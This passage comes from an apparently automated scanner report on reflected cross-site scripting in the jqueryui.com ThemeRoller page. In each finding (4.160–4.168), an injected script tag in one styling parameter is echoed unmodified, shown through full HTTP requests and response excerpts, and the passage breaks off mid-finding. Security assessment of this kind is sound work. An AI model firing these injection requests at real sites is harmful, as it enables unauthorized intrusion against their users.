GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c461800"><script>alert(1)</script>1a28793f45b&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c461800"><script>alert(1)</script>1a28793f45b&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass
...[SNIP]...

4.160. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4a5"><script>alert(1)</script>a8177aafd39 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff2e4a5"><script>alert(1)</script>a8177aafd39&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ghlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff2e4a5"><script>alert(1)</script>a8177aafd39&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opac
...[SNIP]...

4.161. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e25"><script>alert(1)</script>bbf4528bd5e was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff85e25"><script>alert(1)</script>bbf4528bd5e&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff85e25"><script>alert(1)</script>bbf4528bd5e&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgT
...[SNIP]...

4.162. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a5d"><script>alert(1)</script>ddc6b19163f was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=36363644a5d"><script>alert(1)</script>ddc6b19163f&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=36363644a5d"><script>alert(1)</script>ddc6b19163f&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOve
...[SNIP]...

4.163. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb649"><script>alert(1)</script>78dbef2ed8c was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405eb649"><script>alert(1)</script>78dbef2ed8c&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
g&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405eb649"><script>alert(1)</script>78dbef2ed8c&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight
...[SNIP]...

4.164. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12fd4"><script>alert(1)</script>29d7d472bd3 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif12fd4"><script>alert(1)</script>29d7d472bd3&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif12fd4"><script>alert(1)</script>29d7d472bd3&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorCont
...[SNIP]...

4.165. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4afc"><script>alert(1)</script>59f5feaeb48 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1eme4afc"><script>alert(1)</script>59f5feaeb48&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1eme4afc"><script>alert(1)</script>59f5feaeb48&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_
...[SNIP]...

4.166. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83189"><script>alert(1)</script>49897045505 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold83189"><script>alert(1)</script>49897045505&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120191

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold83189"><script>alert(1)</script>49897045505&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTe
...[SNIP]...

4.167. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdabe"><script>alert(1)</script>92b58c8d02c was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08cdabe"><script>alert(1)</script>92b58c8d02c&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08cdabe"><script>alert(1)</script>92b58c8d02c&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08
...[SNIP]...

4.168. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae8b9"><script>alert(1)</script>aee3e277a5 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

